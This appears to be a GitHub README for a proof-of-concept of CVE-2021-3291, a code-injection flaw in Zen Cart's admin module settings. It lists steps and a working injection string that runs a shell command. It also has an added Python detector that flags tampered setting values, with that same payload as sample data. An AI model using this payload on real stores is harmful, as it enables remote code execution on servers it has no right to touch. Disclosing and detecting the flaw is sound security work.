MucahitSaratar/zencart_auth_rce_poc

zencart_auth_rce_poc CVE-2021-3291

1-) Log in as admin.

2-) Open any module's edit page.

3-) Use inspect element on any radio button whose value is true.

4-) change true to true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //

5-) Click update.

6-) To trigger the command, open the edit page again.
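
A defender-side check for the value tampering in steps 3 to 5, as an added example that is not part of the original repository: it audits admin POST bodies and flags module settings whose value is not one of the offered radio options or contains characters that close a quoted PHP string. The `configuration[KEY]` field naming, the `RADIO_OPTIONS` map, the `csrf_token` field and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Assumption: module settings are posted as configuration[KEY]=value fields.
FIELD = re.compile(r"^configuration\[([A-Z0-9_]+)\]$")

# Hypothetical map of radio-button settings to the options the form offers.
RADIO_OPTIONS = {"MODULE_ORDER_TOTAL_TOTAL_STATUS": {"true", "false"}}

# Quote, backtick and backslash: enough to leave a single-quoted PHP string
# or start shell execution. Free-text settings may need a tuned pattern.
BREAKOUT = re.compile(r"['`\\]")


def audit_body(body, radio_options=RADIO_OPTIONS):
    """Return [(key, [reasons])] for suspicious settings in one POST body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        match = FIELD.match(name)
        if not match:
            continue  # not a module setting (e.g. the CSRF token field)
        key = match.group(1)
        reasons = []
        options = radio_options.get(key)
        if options is not None and value not in options:
            reasons.append("not-an-offered-option")
        if BREAKOUT.search(value):
            reasons.append("breakout-characters")
        if reasons:
            findings.append((key, reasons))
    return findings


# Constructed sample bodies (not captured traffic).
BENIGN = urlencode({
    "csrf_token": "0" * 32,  # hypothetical field name
    "configuration[MODULE_ORDER_TOTAL_TOTAL_STATUS]": "true",
    "configuration[MODULE_ORDER_TOTAL_TOTAL_SORT_ORDER]": "999",
})
TAMPERED = urlencode({
    "csrf_token": "0" * 32,
    # The value from step 4 of this README.
    "configuration[MODULE_ORDER_TOTAL_TOTAL_STATUS]":
        "true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //",
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, audit_body(body))
```

The same allow-list comparison belongs server-side before the value is stored, since a radio button restricts the browser form only and not the request.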

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

POC

[Screenshots: exploiting, send command, refresh page, refresh page]

Metasploit

[Screenshot, 2021-01-27 00-03-55]

GIF

[GIF: proof]
